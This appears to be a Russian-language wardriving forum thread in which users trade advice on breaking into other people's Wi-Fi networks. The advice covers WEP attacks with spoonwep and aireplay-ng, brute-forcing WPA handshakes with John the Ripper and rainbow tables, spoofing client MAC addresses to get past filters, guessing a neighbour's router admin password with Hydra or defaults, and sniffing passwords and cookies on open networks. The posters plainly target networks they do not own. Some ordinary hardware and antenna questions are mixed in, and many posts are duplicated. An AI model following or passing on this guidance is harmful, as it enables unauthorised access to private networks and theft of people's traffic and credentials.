Копирую всё за исключением /home и /usr - тоже самое...

И как вот это понимать? :idiot2:

lsmod | grep ath
ath5k * * * * * * * * 107008 *0
mac80211 * * * * * * *217208 *1 ath5k
led_class * * * * * * *12036 *1 ath5k
cfg80211 * * * * * * * 38032 *2 ath5k,mac80211

И на всякий случай полностью:
smod (в обоих системах идентичен)
Module * * * * * * * * *Size *Used by
i915 * * * * * * * * * 65540 *2
drm * * * * * * * * * *96296 *3 i915
binfmt_misc * * * * * *16776 *1
ppdev * * * * * * * * *15620 *0
bridge * * * * * * * * 56340 *0
stp * * * * * * * * * *10500 *1 bridge
bnep * * * * * * * * * 20224 *2
input_polldev * * * * *11912 *0
joydev * * * * * * * * 18368 *0
lp * * * * * * * * * * 17156 *0
parport * * * * * * * *42220 *2 ppdev,lp
arc4 * * * * * * * * * *9856 *2
ecb * * * * * * * * * *10752 *2
ath5k * * * * * * * * 107008 *0
snd_hda_intel * * * * 435636 *3
snd_pcm_oss * * * * * *46336 *0
snd_mixer_oss * * * * *22656 *1 snd_pcm_oss
mac80211 * * * * * * *217208 *1 ath5k
snd_pcm * * * * * * * *82948 *2 snd_hda_intel,snd_pcm_oss
snd_seq_dummy * * * * *10756 *0
snd_seq_oss * * * * * *37760 *0
led_class * * * * * * *12036 *1 ath5k
psmouse * * * * * * * *61972 *0
snd_seq_midi * * * * * 14336 *0
snd_rawmidi * * * * * *29696 *1 snd_seq_midi
snd_seq_midi_event * * 15104 *2 snd_seq_oss,snd_seq_midi
serio_raw * * * * * * *13316 *0
pcspkr * * * * * * * * 10496 *0
intel_agp * * * * * * *34108 *1
cfg80211 * * * * * * * 38032 *2 ath5k,mac80211
iTCO_wdt * * * * * * * 19108 *0
iTCO_vendor_support * *11652 *1 iTCO_wdt
snd_seq * * * * * * * *56880 *6 snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_seq_mid i_event
snd_timer * * * * * * *29704 *2 snd_pcm,snd_seq
snd_seq_device * * * * 14988 *5 snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_rawmidi ,snd_seq
agpgart * * * * * * * *42696 *3 drm,intel_agp
video * * * * * * * * *25360 *0
snd * * * * * * * * * *62628 *15 snd_hda_intel,snd_pcm_oss,snd_mixer_oss,snd_pcm,sn d_seq_oss,snd_rawmidi,snd_seq,
snd_timer,snd_seq_device
soundcore * * * * * * *15200 *1 snd
snd_page_alloc * * * * 16904 *2 snd_hda_intel,snd_pcm
output * * * * * * * * 11008 *1 video
usbhid * * * * * * * * 42336 *0
tg3 * * * * * * * * * 131204 *0
fbcon * * * * * * * * *46112 *0
tileblit * * * * * * * 10752 *1 fbcon
font * * * * * * * * * 16384 *1 fbcon
bitblit * * * * * * * *13824 *1 fbcon
softcursor * * * * * * *9984 *1 bitblit


iwconfig wlan0 Вывод идентичен в обоих системах (вторую специально переключил на Managed).
wlan0 * * IEEE 802.11bg *ESSID:"default" *
* * * * *Mode:Managed *Frequency:2.437 GHz *Access Point: Not-Associated *
* * * * *Tx-Power=20 dBm *
* * * * *Retry min limit:7 * RTS thr:off * Fragment thr=2352 B *
* * * * *Power Management:off
* * * * *Link Quality:0 *Signal level:0 *Noise level:0
* * * * *Rx invalid nwid:0 *Rx invalid crypt:0 *Rx invalid frag:0
* * * * *Tx excessive retries:0 *Invalid misc:0 * Missed beacon:0


Решил переустановиться...
Гружусь с liveCD - режим спокойно переключается. Форматирую все диски, переустанавливаюсь - получаю ту же проблему, как будто поддержка Ad-hoc зависит от того на каких дисках стоит система... :'(

Сегодня скачал последнюю сборку Runtu на основе 9.04 - та же ситуация. Радует только, что видео из коробки заработало.

Сегодня наткнулся на WEP точке с Share Auth, пытаюсь фейково соединиться - хрен, все время деавторизация. Щито с ней делать? Один раз пустило, пакетов немного нагнал и все заглохло. Но дело не в этом - ключ я знаю, но точка скрытая, и имеет вышеуказанную аутентификацию, а нужно подсоединится к ней с винды. Ссид я тоже знаю, но если руками вбиваю ключ и веп-опен, просто вечный коннект.
Попробуй в настройках адаптера прописать какой нибудь айпишник,например 192.168.1.2 и маску незабудь 255.255.255.0,на кройняк основной шлюз,он отличается одной цифрой 192.168.1.1.У меня такая же сетка!нифига не конектилась пока я всё выше описаное не прописал!только там ещё может быть фильтрация по макам,тогда подставь мак клиента который рядом с точкой бывает!и желательно конектится когда этого клиента не будет в сети!Удачи!и если можешь напиши как получилось!

Советчик xDD
Коннект от айпишника точно не зависит, а на счет мака - я уже давно пробовал, еще с самого начала xD
Думается мне, что у меня стаж в вардрайвинге побольше, чем у тебя +)
А спрашивал я у людей, которые больше знают меня. Кстати, говоря - каким боком ты увидел проблемы при обычном коннекте? Я срашивал про веп с шаровой авторизацией, да.

Доброе время суток, коллеги!
Вопрос м.б. дурацкий, но все же. У меня карточка PCMCIA "Wireless PC Card model 0110" от фирмы Compex "\Wave Port WL11+" подходит ли она для экспериментов с вардрайвингом под ВинХР? Спасибо.

Доброе время суток, коллеги!
Вопрос м.б. дурацкий, но все же. У меня карточка PCMCIA "Wireless PC Card model 0110" от фирмы Compex "\Wave Port WL11+" подходит ли она для экспериментов с вардрайвингом под ВинХР? Спасибо.
в списках я не видел , на хр , качвни софт про тесть.

Доброе время суток, коллеги!
Вопрос м.б. дурацкий, но все же. У меня карточка PCMCIA "Wireless PC Card model 0110" от фирмы Compex "\Wave Port WL11+" подходит ли она для экспериментов с вардрайвингом под ВинХР? Спасибо.
смотри на каком чипе она сделана.

Подскажите, я взломал WEP и получил ключ. Куда теперь его вводить?

смотри на каком чипе она сделана.
Спасибо за совет но где смотреть? На карточке ничего нет в сети тоже...=((

Получил пароль от WEP сети, ввёл и не подключает, в чём может быть проблема ? При получении пакетов был список пользователей, несколько, тоесть как я понел роутер, но всёравно не подключает. Может кто в курсе? Возможно есть дополнительные настройки сети? Но какие? В другие сети подключает без проблем. Возможно изза мак адреса? Если да, то поменяв его на один из списков я смогу подключиться?

Здрасте господа!Просветите если не трудно,я использую backtrack3,программа spoonwep2,но вот столкнулся с такой ситуацией,провожу атаку ARP REPLAY ATTACK,всё идёт нормально :
associeted
attacking
cathering arp
arp replaying
но вот дата пакеты не собираются,к точке в этот момент подключен другой комп,ево пакеты я собираю(скорость естественно не очень),а когда мой проводит атаку (arp replay),пакеты не идут.Точку взял другой атакой,fragmentacion & forge attack.Просто интересно почему пакеты не идут как на других точках.Если кто понимает,растолкуйте.Plees!

Здрасте господа!Просветите если не трудно,я использую backtrack3,программа spoonwep2,но вот столкнулся с такой ситуацией,провожу атаку ARP REPLAY ATTACK,всё идёт нормально :
associeted
attacking
cathering arp
arp replaying
но вот дата пакеты не собираются,к точке в этот момент подключен другой комп,ево пакеты я собираю(скорость естественно не очень),а когда мой проводит атаку (arp replay),пакеты не идут.Точку взял другой атакой,fragmentacion & forge attack.Просто интересно почему пакеты не идут как на других точках.Если кто понимает,растолкуйте.Plees!

Чисто технически растолковать не могу, но по опыту скажу, что лучше всего идет вторая атака P0841, Эти 2 атаки на моей практике идут на точках где нет фильтрации по МАК адресам. Оставшии 2 идут только с клиентами.

Спасибо 4ikotillo,завтра,точнее уже сегодня пойду по охочусь,отпишусь,для меня это спортивный интерес.Не пробовал правда WPA-взлом,не попадалась.

Вот с интересной точкой столкнулся,по диагностике нормальная WEP-точка,первое что насторожило не проходит associeted(где то за 5 разом),во время атаки не идут дата пакеты,ни с arp replay attack,p0841,ни fragmentacion forge attack.Подключений к ней видимо нет,сигнал нормальный,сами дата пакеты идут переодически(10min-1 дата пакет).Что может быть,фильтрация по макам?Да рядом с домом находится вышка местного интернет провайдера,может это он;)))).
Программа spoonwep 2.

Вот с интересной точкой столкнулся,по диагностике нормальная WEP-точка,первое что насторожило не проходит associeted(где то за 5 разом),во время атаки не идут дата пакеты,ни с arp replay attack,p0841,ни fragmentacion forge attack.Подключений к ней видимо нет,сигнал нормальный,сами дата пакеты идут переодически(10min-1 дата пакет).Что может быть,фильтрация по макам?Да рядом с домом находится вышка местного интернет провайдера,может это он;)))).
Программа spoonwep 2.

Я сталкивался только один раз в своей практике с такой точкой, тоже около моего дома находится, провайдерская, отсылает 1 дата пакет в минуту, клиентов нет к ней, и хоть убейся - ничего не сделаешь!!! Видимо это HOtSpot, я такие не ломал. А Дата пакеты, это видимо "маячки", с другим HotSpotом или тот же самый пинг.

как протестировать вай-файку??? фотки здесь -
http://narod.ru/disk/12470485000/DSC00323.JPG.html
http://narod.ru/disk/12470474000/DSC00322.JPG.html
вроде все целое, но не работает.. при подключении лампочка загорается, но сетей не находит... чем можно протестить???

Elvis000 ты описывал AiroWizard 1.0 Beta revision, при запуске программы вылетает вот ето:
http://pic.ipicture.ru/uploads/090827/JtiFWRyDHb.jpg
при том, что после переустановки (скачивал прогу с разных мест) ошибка повторилась.
Што ето? проблема в netframework?

вот что имею: Intel(R) PRO/Wireless 3945ABG Network Connection
Netgear RangeMah(TM) Wireless USB 2.0 Adapter WPN 111
netstambler с intel rabotaet нормально.....вижу точки и всю инфо по ним...ок
aircrack конечно же отказался сотрудничать, как и AiroWisard....
за три дня проведенных на античате подчерпнул конечно многое....
....смена сетевых адаптеров пока не предвидиться......пока..как быть?
не исключаю есть другие варианты....пока не накопал!
все в замкнутый круг....
просмотрел прошлые труды и комменты m0le[x] и Elvis000 респект вам и человеческая благодарность....)
....как? имея ето железо, заточить в нужном направлении...... или никак!

возможно ли заменить драйвер на адаптере Netgear на нужный и чтоб работал со всем необходимым софтом ?

Elvis000 ты описывал AiroWizard 1.0 Beta revision, при запуске программы вылетает вот ето:
http://pic.ipicture.ru/uploads/090827/JtiFWRyDHb.jpg
при том, что после переустановки (скачивал прогу с разных мест) ошибка повторилась.
Што ето? проблема в netframework?

По всей видимости, да.

посоветуйте Wifi сканер,помимо Networ Stumbler

По всей видимости, да.
Netframework 2 переустановить?

Elvis000
все решилось само сабой AiroWisard запустился сегодня....незнаю пока причину....подозреваю что глючит ОС...

Приветствую всех. Проблемка на BackTrackе Pre 4ом.. При попытке запуска aireplay-ng в режиме теста. Инжект возможен.. При попытке отправки Arp пакетов.. Нифига не получаю обратно. Все по нулям. Все параметры перепробовал. Уменшал rate до 1М.
Карта - iwl3945 (Intel 3945 abg)
Вообще без понятия почему. Сигнал -80. Имхо, может слабый? потому что в инете смотрел с моей карточки ломали с помощью AirePlay-а..

Просто по 100 дата пакетов в 40-60 минут.. Это не дело..

видимо слабый сигнал.

Ясно. Спасибо. Завтра тогда выберусь поближе.


Другой Вопрос. Маки клиентов .. Это, как я понял, те что ассоциированы с этим BSSIDом сети, ниже cписка сетей в AiroDumpe?

Приветствую всех. Проблемка на BackTrackе Pre 4ом.. При попытке запуска aireplay-ng в режиме теста. Инжект возможен.. При попытке отправки Arp пакетов.. Нифига не получаю обратно. Все по нулям. Все параметры перепробовал. Уменшал rate до 1М.
Карта - iwl3945 (Intel 3945 abg)
Вообще без понятия почему. Сигнал -80. Имхо, может слабый? потому что в инете смотрел с моей карточки ломали с помощью AirePlay-а..

Просто по 100 дата пакетов в 40-60 минут.. Это не дело..
Либо сигнал слабый, либо авторизацию не проходишь, попробуй с маком клиента.....

у меня проблемма:

Взломал APшку, получил ключ.
Соединяюсь из под MACа администратора.
Система WINдовоз хп.

При соединении инет есть и пишет 100мб хотя у мя карта 54 может максимум дать
соединение вайфай пишет "статус: проверка удостоверения пользователя".
Также виден значек что коннект пытается настроится - короче "инет" у мя не стабильный и за....о это сообщение

КАК с этим боротся ?

Ты уверен что пароль правильный?
Что потом пишет? Что соединение ограничено?

Сорри - это просто моя паника !
Всё победил проблемму. Я забыл убрать галочку с пункта о проверки сертификата у себя в соединении - а вот насчет 100мб оказалось правдой у него стоит длинк DIR-615. Инет получил стабильный и хотся получить еще доступ к ADMIN акк.. его DLINKа доступ через USER без пароля - смотреть на Интерфейс можно но руками не потрогаеш -




кто нить знает где у ДЮВАЙСА "DIR-615" лежит config
ибо UDP кажется открыт ?

Сорри - это просто моя паника !
Всё победил проблемму. Я забыл убрать галочку с пункта о проверки сертификата у себя в соединении - а вот насчет 100мб оказалось правдой у него стоит длинк DIR-615. Инет получил стабильный и хотся получить еще доступ к ADMIN акк.. его DLINKа доступ через USER без пароля - смотреть на Интерфейс можно но руками не потрогаеш -




кто нить знает где у ДЮВАЙСА "DIR-615" лежит config
ибо UDP кажется открыт ?

Попробуй с помощью утилы HydraGTK перебрать пароль.

Сорри - это просто моя паника !
Всё победил проблемму. Я забыл убрать галочку с пункта о проверки сертификата у себя в соединении - а вот насчет 100мб оказалось правдой у него стоит длинк DIR-615. Инет получил стабильный и хотся получить еще доступ к ADMIN акк.. его DLINKа доступ через USER без пароля - смотреть на Интерфейс можно но руками не потрогаеш -




кто нить знает где у ДЮВАЙСА "DIR-615" лежит config
ибо UDP кажется открыт ?


Извини меня конечно.. Можешь считать меня хоть Нубом и ламером. Но нафига тебе админка? Юзай нетом. Чел вдруг запалит. Сменит Пароли на Wlan и админку.


Стандартные пароли попробуй ;) частенько не меняют ламерки ))







Добыл ХандШейк. Простыми словариками не получилось брутануть.. ЮзаЙу Jtr. Сколько времени может занять брут его примерно со скоростью 400-700 паролей в секунду?


А Backtrack 4ый - ВесЧЪъъъ! Ыыы +)

Добыл ХандШейк. Простыми словариками не получилось брутануть.. ЮзаЙу Jtr. Сколько времени может занять брут его примерно со скоростью 400-700 паролей в секунду?

Это которая использует Rainbow таблицы и ресурсы видеокарты?


А Backtrack 4ый - ВесЧЪъъъ! Ыыы +)

Чем хорош, какими утилами пользуешься в нем для взлома? или же все по старинке - ручками?

Привет всем!!!У меня вопросик такой по p0841 Reply attack,сколько пакетов надо набрать для взома 128 битного,вчера сломал точку,собрал 478654 пакета,а ключик по количеству символов похож на 128 битный,ARP Reply attack не пошла попробовал эту.По мему опыту для взлома 128,надо от 40000 до 100000,а тут пол милиона.Другая точка не поддалась ни накакие уговоры,на ней кто то работал,аутентификацию я прошёл на ChopChop и Fragmentation attack но при атаке не дала ни единого пакета,кстати закономерность какая то точки оканчивающиеся на D,вот такие 3_D и 6_D,не поддаются.Чё за хрень такая не пойму?Может кто то сталкивался с подобным.

Это которая использует Rainbow таблицы и ресурсы видеокарты?

Чем хорош, какими утилами пользуешься в нем для взлома? или же все по старинке - ручками?


Ну не ножками же ) А черт его знает. Мне лень че то мудрить. С Линухой 4ый день. Пара часов гемора, потом дело пошло в гору. Ща пытаюсь подобрать.. за 20 часов 24 мила. Мало все же.


Ай. Я, как ламер, по инструкции. Сейчас времени нету че-то мутить. Страйбол, Игры на выезд.. Конец лета, то се.. Стоит брутит и все ))

А ты желаешь что-то мне посоветовать ? :} Что побыстрее и постабильнее.

Искал тут этот 33 гиговый словарь.. Так там че то трэкер не валит на оффициалке этой.. Вообще Лажо ))

Всем привет.Вот прочитал статью:

_http://www.xakep.ru/magazine/xa/123/064/1.asp

Тут чел писал,как можно обмануть aircrack и wepcrack,чтобы не найти ключи.Защита исходила из того,что для нахождения ключа определённой длины нужно определённое количество пакетов,что и логично для методов статистического анализа.Выяснив работу алгоритма,а он состоял в том,что вепкрэк не смог отличать пакеты разных алгоритмов шифрований,а также последовательный и безразборный анализ пакетов,он решил частично рандомизировать передачу мусорного трафика.Именно мусорного.Но он также отметил,что метод этот не годится против ручного анализа.Тогда вопрос,как проводится ручной анализ и как различить пакеты разных алгоритмов,кроме как по длине пакета ? Также хотелось бы знать,как вообще представляется возможным получение клюса в ручном режиме,если там сотни тысяч пакетов нужно проанализировать...Непонят� �о в общем.Также я понял,что чтобы обмануть 64-битный взлом ключа WEP,нуджно последовательность из 50к пакетов длины 64 бита прерывать любым другим количеством пакетов.Правильно ли я понял ? При чём делать это надо постоянно после каждой последовательности.

Ну не ножками же ) А черт его знает. Мне лень че то мудрить. С Линухой 4ый день. Пара часов гемора, потом дело пошло в гору. Ща пытаюсь подобрать.. за 20 часов 24 мила. Мало все же.


Ай. Я, как ламер, по инструкции. Сейчас времени нету че-то мутить. Страйбол, Игры на выезд.. Конец лета, то се.. Стоит брутит и все ))

А ты желаешь что-то мне посоветовать ? :} Что побыстрее и постабильнее.

Искал тут этот 33 гиговый словарь.. Так там че то трэкер не валит на оффициалке этой.. Вообще Лажо ))

На torrents.ru посмотри)))

А вообще я за автоматизацию произодства))) Но ручками надо тоже уметь, тут кто-то рекламировал программку....

Посоветовать могу только одно - ищи у друзей комп с мощной видюхой!!!)))

Всем привет.Вот прочитал статью:

_http://www.xakep.ru/magazine/xa/123/064/1.asp

Тут чел писал,как можно обмануть aircrack и wepcrack,чтобы не найти ключи.Защита исходила из того,что для нахождения ключа определённой длины нужно определённое количество пакетов,что и логично для методов статистического анализа.Выяснив работу алгоритма,а он состоял в том,что вепкрэк не смог отличать пакеты разных алгоритмов шифрований,а также последовательный и безразборный анализ пакетов,он решил частично рандомизировать передачу мусорного трафика.Именно мусорного.Но он также отметил,что метод этот не годится против ручного анализа.Тогда вопрос,как проводится ручной анализ и как различить пакеты разных алгоритмов,кроме как по длине пакета ? Также хотелось бы знать,как вообще представляется возможным получение клюса в ручном режиме,если там сотни тысяч пакетов нужно проанализировать...Непонят� �о в общем.Также я понял,что чтобы обмануть 64-битный взлом ключа WEP,нуджно последовательность из 50к пакетов длины 64 бита прерывать любым другим количеством пакетов.Правильно ли я понял ? При чём делать это надо постоянно после каждой последовательности.

Могу предположить что стоит попробовать открыть cap файл с помощью wireshark или commview? отсеять ненужное, для начала по размеру хотябы, сохранить и скормить aircrack. Но это только догадка.....

На torrents.ru посмотри)))

А вообще я за автоматизацию произодства))) Но ручками надо тоже уметь, тут кто-то рекламировал программку....

Посоветовать могу только одно - ищи у друзей комп с мощной видюхой!!!)))

Да я смотрел про видео.. Но понимаешь.. Чела уломать поставить перебиралку.. В наше время.. Тут хер уломаешь кого на прокси : ))))

Да я смотрел про видео.. Но понимаешь.. Чела уломать поставить перебиралку.. В наше время.. Тут хер уломаешь кого на прокси : ))))

Для меня например не составляет проблем...... ИМХО))))

Для меня например не составляет проблем...... ИМХО))))

Нашел я наконецто тейбл на 33 гига.. Если что называется wpa_psk-h1kari_renderman (вдруг кому понадобится) :p :p

Салют,у меня вопрос=)мне надо узнать проходимость сигнала WI FI в блочном доме,я живу на 1 этаже,а знакомый на 4...метров так 25 максимум(не над ним живу а в другом крыле дома.)
Хочу сделать с ним интернет...купить ему модем с точкой доступа и хабом,себе сетевую карту с точкой доступа.

Вроде написал все правильно,если что-то не так,не ругайте))я в этом плохо разбираюсь,хочу обратится к Вам за помощью.

Салют,у меня вопрос=)мне надо узнать проходимость сигнала WI FI в блочном доме,я живу на 1 этаже,а знакомый на 4...метров так 25 максимум(не над ним живу а в другом крыле дома.)
Хочу сделать с ним интернет...купить ему модем с точкой доступа и хабом,себе сетевую карту с точкой доступа.

Вроде написал все правильно,если что-то не так,не ругайте))я в этом плохо разбираюсь,хочу обратится к Вам за помощью.
Если видимости квартир из окон нет, то врядли сигнал пробьёт такое препядствие! Если между вами 25 метров, не проще ли протянуть витую пару и сделать локалку с инетом, в таком варианте и скорость повыше будет.

Если видимости квартир из окон нет, то врядли сигнал пробьёт такое препядствие! Если между вами 25 метров, не проще ли протянуть витую пару и сделать локалку с инетом, в таком варианте и скорость повыше будет.


то есть ты предлагаешь купить сетевой кабель и модем соответствующий?Спасибо,уч ту такой вариант=)только есть и плохие стороны,если вести через коридор,то какой-нить ***** может кабель та мой иголочкой или чем нибудь испортить((((

кто-нить видел spoonwep под bt4
если есть то поделитесь плиз...

вопрос актуален...

доброго времени суток, столкнулся с проблемкой в дистрибутибе BT3 и BT4 при замене мак адреса, airdump-ng перестаёт находить какие либо точки доступа, а с родным маком всё нормально работает, может кто знает в чём проблема? работаю с Belkin F5D7050, Chipset: Ralink 2570, Driver: rt73

то есть ты предлагаешь купить сетевой кабель и модем соответствующий?Спасибо,уч ту такой вариант=)только есть и плохие стороны,если вести через коридор,то какой-нить ***** может кабель та мой иголочкой или чем нибудь испортить((((
Можеш кабель спятать в короб, металлорукав и т.п.

доброго времени суток, столкнулся с проблемкой в дистрибутибе BT3 и BT4 при замене мак адреса, airdump-ng перестаёт находить какие либо точки доступа, а с родным маком всё нормально работает, может кто знает в чём проблема? работаю с Belkin F5D7050, Chipset: Ralink 2570, Driver: rt73

У меня тоже самое было с Wireless G USB Adapter Belkin F5D7050, я просто приобрел себе другую Adapter D-link dwa110 и все стало хорошо

У меня тоже самое было с антенной Belkin F5D7050, я просто приобрел себе другую антенну D-link dwa110 и все стало хорошо
ramtor, ты или запятые расставляй или смотри что пишеш! Belkin F5D7050 - это не антенна, а юсбишный вай-фай свисток или другими словами Wireless G USB Adapter. И причём тут антенна и смена мак адреса, да и куда ты эту самую антенну ему подключал, если у него даже разъема под нее нету(без модификации, перепайки самого свистка)!!! :mad:

подскажите плз где монжо найти список программ входящих с дистрибутива BT4?
хочу весь софт поставить на MAC и юзать без образа...

проблему решил, оказывается ето проблемя vmware, сори забыл про ето написать, как записал БТ4 на компакт и загрузился с него, то всё стало прокрастно работать

Подскажите, пжлста,
Что это за точка:
----------------
Network 23: "*****" BSSID: "***********"
Type : turbocell
Carrier : 802.11g
Info : "None"
Channel : 00
Encryption : "None"
Maxrate : 0.0
LLC : 0
Data : 5502
Crypt : 0
Weak : 0
Dupe IV : 0
Total : 5502
--------------------------------
Можно как то приконнектиться к ней? Данных очень много через нее проходит. На ней висят как я понял еще какие то ТД, и вот на них уже WPA, а эта открытая, только вот ее не видят проги подключения.

Подскажите, пжлста,
Что это за точка:
----------------
Network 23: "*****" BSSID: "***********"
Type : turbocell
Carrier : 802.11g
Info : "None"
Channel : 00
Encryption : "None"
Maxrate : 0.0
LLC : 0
Data : 5502
Crypt : 0
Weak : 0
Dupe IV : 0
Total : 5502
--------------------------------
Можно как то приконнектиться к ней? Данных очень много через нее проходит. На ней висят как я понял еще какие то ТД, и вот на них уже WPA, а эта открытая, только вот ее не видят проги подключения.

Повторитель? И что за канал 00?

И что за канал 00?
Ага, мне вот тоже интересно :)
ЗЫ
Забыл еще сказать - довольно далеко бьет! Радиус примерно на 2км

ДОПОЛНЕНИЕ:
Нарыл немного инфы про протокол турбоселл. Немного стало понятно. Но так же по идее должна быть все же возможность коннекта, но для этого нужны дрова. В репозитариях Федоры на запрос по turbocell ни чего не нашел. В инете тоже инфы (подробной) как то немного . У кого может есть какие то ссылки, буду признателен за них :)

Привет у меня вопросик,вот например есть точка доступа открытая для всех.
Мне интерестно как можно принимать чужой трафик???
В каком виде он будет???
И можно ли будет добыть пароли от страниц где человек будет вводить свои данные???
Или хотя бы получить куки???

траф прослушивается снифером, типа wireshark.
пароли видно только если они не шифрованые.
статьи по wardriving тебе в помощь.

Привет, есть несколько вопросов по ноутбучным карточкам формата mini PCI-E. Поискал по теме, вроде ничего подобного не спрашивали.

Собственно вопросы:
На этих карточках есть два разъёма для подключения антенны, интересно знать как называется такой тип разъёмов и как они используются (для подключения ссимметричной антенны типа диполь или один разъём на передачу, а другой на приём?). Ну и соответсвенно как подключить антенну к такой карточке. Можно ли вывести разъём наружу, куда лучше подпаиваться?

Привет, есть несколько вопросов по ноутбучным карточкам формата mini PCI-E. Поискал по теме, вроде ничего подобного не спрашивали.

Собственно вопросы:
На этих карточках есть два разъёма для подключения антенны, интересно знать как называется такой тип разъёмов и как они используются (для подключения ссимметричной антенны типа диполь или один разъём на передачу, а другой на приём?). Ну и соответсвенно как подключить антенну к такой карточке. Можно ли вывести разъём наружу, куда лучше подпаиваться?
На самих платах карточек находится 2 разъема MMCX или U.FL, так как фото твоей карточки нету, то точно сказать не могу, но скорее всего MMCX, они намного чаще встречаются на платах Wi-Fi адаптеров. Над каждым из разъемов есть надпись, к тому, возле которого написано MAIN, и подключай внешнюю антенну через соответствующий пигтейл...

p.s. по поводу пигтейлов и их разновидностей смотри инфу в поисковиках или на форуме по поиску, уже обсуждалось ранее! ;)

Немного продолжу тему по протоколу turbocell. :)
Наснифил wireshark-ом траф с той ТД. За минуту-две снифа насобирал 18000 пакетов. Сейчас просмотрел - похоже что трафик вроде как не шифрованный - видна какая то авторизация торрент-клиента. Много мусора конечно. Жаль - но почему то Ettercap не видит траф, он бы отсеивал не нужный траф.) Ну да ладно, нужно будт попробовать еще dsniffer-ом! :)
Кста - определил что за ТД - это точно типа ретранслятор местного провайдера :)
ЗЫ
Сейчас немного внимательней проанализировал пакеты - похоже что перехватываются только входящие в сеть пакеты. Исходящих пока не нашел :( Может плохо искал? :))

pomogite pozalusta,u menia vstroenyj adapter intel wireless wifi link 4965agn,noutbook lenovo,Tak vot ego ne vidiat ili ne xotiat rabotat vse progi kotorye sdes sovetujut.A mne nado wep kod scitat.Skazite kak byt?Drugoj adapter kupit net vozmoznosti.Zaranee blagodaren

Уважаемые профи подскажите, пригоден ли адаптер asus wl - 160w для вардрайвинга ?
http://www.3dnews.ru/news/asus_wl_160w_adapter_wi_fi_s_podderzhkoi_802_11n/
Просто я не силен в этом, незнаю на каком чипсете он сделан, заранее спасибо.

Хотел поинтересоваться..

Мошность канала в порядка возрастания, от слабого к сильному.. от -100 ДБ до 100 дб?

Просто не могу понять .. на -70 тирЭ -90 не работает инжэкт пакетов.. при -0 1 (aireplay) паказывает что работает.. когда кидать начинаю.. Вижу что не сетка получает.. А клиенту притекает пакетов тысячами.. почему так? Все варианты пробовал..

blin,kod nasiol,podkliucilsia.No tolko k lokalke,kod drug scital,a kak v net vyjti?

Привет всем есть открытые AP но с фильтрацией по маку, я могу к ним подключиться если поменяю свой мак на мак AP вопрос : это фича или баг AP, кто с этим сталкивался ?

Ищу нормальный словарик для wpa.
wpa_psk_h1kari не подошел ибо ломать надо на линуксе.. а я для этого дедик использую..

Кто подскажет ? Elcomsoft ща пробую..
Там есть модификация слов..
Т.к. перебор словарей штук 20 по 10-100 мб.. не подошел.. Если кто-то знает хороший словарик.. или генератор..

Конечно на деда я его долгоооо буду сливать.. :rolleyes:

Привет всем есть открытые AP но с фильтрацией по маку, я могу к ним подключиться если поменяю свой мак на мак AP вопрос : это фича или баг AP, кто с этим сталкивался ?
В принципе сможеш, если нет других подвохов, надо пробовать. Только МАК надо поменять на тот, который прописан в разрешенных на точке доступа, к которой хочеш подключиться, а не МАК самой точки доступа к которой будеш подключаться!

Можно ли впарить билайну что ты сидишь во free зоне вместо обычной где проситься пароль и логин.

drive_pan вы меня не поняли я реально к ним подключаюсь, может это глюк в прошивки AP ??

drive_pan вы меня не поняли я реально к ним подключаюсь, может это глюк в прошивки AP ??
хз...

Всем привет! Возможно, у меня интересный вопрос... Запустил себе BT4, с помощью airodump увидел множество запароленных wpa сеток, но есть и одна со статусом OPN, то бишь открытая... Но windows её не видит, хотя уровень сигнала 84. я так понимаю, что она скрыта? Вижу мас подключенного клиента. И в общем, сама суть вопроса... Хотелось бы к ней подключиться... Если я поставлю себе такой же мас, что и у клиента, это решит проблему? Или тут нужно сделать её видимой?

Почитал тут немного и понял, что сигнал -84, а это ппц как далеко, нет смысла заморачиваться, связь будет неустойчивой...(( Буду пытаться ломать wpa... кто знает, как в BT4 выйти из окна загрузки в обычный интерфейс? пробовал root, но не получается.

оПомогите найти драйвер к Intel(R)/Wireless 3945ABG для CommView?

Это правда, что большинство адаптеров не будут работать под виндой ?

Это правда, что большинство адаптеров не будут работать под виндой ?

Под winXp все должны работать,смотря для чего ты их будешь использовать!Если для вардрайвинга то список здесь: https://forum.antichat.ru/thread57249.html Про висту я не в курсе так как использую XP!

оПомогите найти драйвер к Intel(R)/Wireless 3945ABG для CommView?

Облазил мноного форумов, многие пишут что эта карта не работает с CommView! Посмотри здесь http://downloads.zdnet.com/abstract.aspx?kw=WIFI&docid=602303 правда я незнаю что это за дрова,стандарт или вардрайвинг.

Под winXp все должны работать,смотря для чего ты их будешь использовать!Если для вардрайвинга то список здесь: https://forum.antichat.ru/thread57249.html Про висту я не в курсе так как использую XP!
ну конечно все мы знаем, для чего я хочу их использовать. Просто к примеру вот здесь: http://wiki.wifi.ee/index.php?title=Aircrack_NG для Linksys WUSB54G v4 да и для многих других указано мол Windows Support - NO. А в том списке, данном тобой она присутствует, так как на самом деле ?

И еще вопрос вдогонку: От чего зависит зона приема сигнала - от мощности адаптера или антенны ? То есть если адаптер будет воткнут в ЮСБ а антенна будет по удлинителю в зоне приема, то сигнал будет нормальный ?

Можно ли зная dBm определить мощность сигнала в процентах? Если да, то как?

ну конечно все мы знаем, для чего я хочу их использовать. Просто к примеру вот здесь: http://wiki.wifi.ee/index.php?title=Aircrack_NG для Linksys WUSB54G v4 да и для многих других указано мол Windows Support - NO. А в том списке, данном тобой она присутствует, так как на самом деле ?

И еще вопрос вдогонку: От чего зависит зона приема сигнала - от мощности адаптера или антенны ? То есть если адаптер будет воткнут в ЮСБ а антенна будет по удлинителю в зоне приема, то сигнал будет нормальный ?
Насчет твоего адаптера я тоже нечего не понял,может быть дело в том что можно её использовать в вардрайвинге при помощи других систем ВТ3-4,линукс, а в windows возможно она и не будет работать!Короче нужно разбиратся!
Вообще мощьность сигнала зависит от адаптера и антены,есть адаптеры которые можно регулировать мощность так же ты можешь увеличить качество сигнала с помощью направленной всенаправленной антены! например мой писи адаптер с выходной мощьностью 18-15 dBm и стандартая антена дала мне мощности 2,5 dBi, я решил изготовить баначную и панельную антену. Баначная антена дала мне мощности в 12 dBi, панальная антена превзошла баначную и увеличила сигнал +7-9 dBi.а при регулировки самого адаптера в общей сложности при использовании панельной направленной антены Фа20 получился сигнал в 24,5 dBi.Без регулировки мощность была 21 dBi.А ещё я нашёл в инете антену которую хочу купить мощьностью в 30 dBi.Хочу взять инет в 3х км от меня.не забывая о том что также эту мощность можно потерять если сильно будет длинный кабель!максимум 2.5 м.

